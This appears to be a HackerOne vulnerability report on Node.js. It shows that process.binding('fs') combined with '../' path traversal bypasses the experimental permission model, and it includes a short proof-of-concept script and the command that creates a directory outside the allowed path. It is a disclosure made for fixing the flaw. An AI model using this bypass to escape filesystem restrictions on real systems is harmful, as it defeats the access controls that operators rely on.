Lucene search

K
hackeroneRafaelgssH1:2051257
HistoryJul 05, 2023 - 3:54 p.m.

Node.js: process.binding() can bypass the permission model through path traversal

2023-07-0515:54:29
rafaelgss
hackerone.com
45
node.js
fs method
permission model
path traversal
bypass
bug bounty

EPSS

0.001

Percentile

22.1%

Summary: process.binding(‘fs’) bypassed the permission model validation against path traversal

Description: process.binding(‘fs’) can be used to bypass the path traversal validation for the permisison model

Steps To Reproduce:

Create the following index.js and store at /home/pathtraversal/

// index.js
const fs = process.binding('fs')

fs.mkdir('/home/pathtraversal/../test0', 511, false, null, null)
$ pwd
/home/pathtraversal/
$ node --experimental-permission --allow-fs-read="/home/pathtraversal/*" --allow-fs-write="/home/pathtraversal/*" index.js

/home/test0 will be created bypassing the permission model validation

Impact

All the methods exposed by the process.binding(‘fs’) could eventually bypass the permission model using path traversal. It will require the attacker to read the node_file.cc implementation, but that’s trivial.